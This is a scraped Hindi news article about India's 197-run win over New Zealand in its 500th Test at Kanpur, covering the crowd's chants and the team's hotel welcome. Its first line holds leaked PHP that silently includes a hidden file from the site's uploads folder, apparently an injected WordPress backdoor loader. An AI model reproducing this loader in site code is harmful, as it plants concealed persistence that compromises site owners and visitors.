add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); जीत के बाद मैदान में लगे वंदेमातरम के नारे, टीम का होटल में जोरदार स्वागत – SOCH INDIA
Menu

खेल
जीत के बाद मैदान में लगे वंदेमातरम के नारे, टीम का होटल में जोरदार स्वागत

nobanner

 

कानपुर: टीम इंडिया की अपने ऐतिहासिक 500वें टेस्ट मैच में न्यूजीलैंड पर 197 रन से जीत के बाद ग्रीन पार्क स्टेडियम भारत माता की जय और वंदेमातरम के नारों से गूंज उठा.

 

इसके बाद भारतीय टीम जब होटल पहुंची तो वहां खिलाड़ियों पर पुष्पवर्षा की गयी और उनका जबरदस्त स्वागत किया गया. भारतीय टीम के सदस्यों ने भी होटल में जमकर मस्ती की. ग्रीन पार्क स्टेडियम में लंच के बाद जैसे ही न्यूजीलैंड का आखिरी विकेट गिरा वैसे ही स्टेडियम में चारों तरफ भारत माता की जय और वंदेमातरम के नारे गूंजने लगे.

 

दर्शक इस ऐतिहासिक टेस्ट मैच में जीत पर झूमने लगे. वैसे आज सप्ताह का पहला दिन सोमवार था इसके बावजूद आज स्टेडियम में शुरू के दो दिनों के मुकाबले ज्यादा दर्शक आए थे. असल में सभी को अहसास था कि भारत टी से पहले ही जीत दर्ज कर लेगा और सभी इस क्षण का गवाह बनना चाहते थे. मैच के बाद जब भारतीय खिलाड़ी अपने होटल पहुंचे वहां मौजूद कर्मचारियों ने खिलाड़ियों पर फूलों की बारिश की और उनका स्वागत फूल मालाओं से किया. बाद में होटल की लॉबी में ही खिलाड़ियों ने केक काटकर जश्न मनाया.

 

होटल ने टीम के स्वागत के लिए जबरदस्त तैयारियां की थी. उत्तर प्रदेश क्रिकेट संघ के निदेशक एस के अग्रवाल ने बताया कि भारत और न्यूजीलैंड की टीमें कल 27 सितंबर को दोपहर यहां से लखनऊ जाएंगी फिर वहां से दूसरे टेस्ट के लिए कोलकाता के लिए रवाना होंगी